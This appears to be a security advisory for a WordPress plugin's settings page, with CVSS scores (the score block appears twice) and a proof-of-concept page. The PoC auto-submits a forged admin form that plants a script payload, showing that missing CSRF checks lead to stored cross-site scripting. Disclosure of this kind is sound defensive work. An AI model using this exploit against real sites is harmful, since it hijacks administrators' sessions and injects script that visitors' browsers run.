9 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
6 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:S/C:P/I:P/A:P
The plugin does not have CSRF check when saving its settings, and did not sanitise as well as escape some of them, which could allow attacker to make a logged in admin change them and perform Cross-Site Scripting attacks
<html>
<body>
<form action="https://example.com/wp-admin/admin.php?page=fca_pc_settings_page" id="hack" method="post">
<input type="hidden" name="fca_pc[has_save]" value="1" />
<input type="hidden" name="fca_pc_save" value="1" />
<input type="hidden" name="fca[trigger_type]" value="post" />
<input type="hidden" name="fca_pc[event_name]" value="" />
<input type="hidden" name="fca_pc[value]" value="" />
<input type="hidden" name="fca_pc[currency]" value="" />
<input type="hidden" name="fca_pc[content_name]" value="" />
<input type="hidden" name="fca_pc[content_type]" value="product" />
<input type="hidden" name="fca_pc[content_ids]" value="" />
<input type="hidden" name="fca_pc[content_category]" value="" />
<input type="hidden" name="fca_pc[search_string]" value="" />
<input type="hidden" name="fca_pc[num_items]" value="" />
<input type="hidden" name="fca_pc[status]" value="" />
<input type="hidden" name="fca_pc[google_product_category]" value="'><script>alert(document.domain);</script>" />
<input type="submit" value="submit request" />
</form>
</body>
<script>
var form1 = document.getElementById('hack');
form1.submit();
</script>
</html>
9 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
6 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:S/C:P/I:P/A:P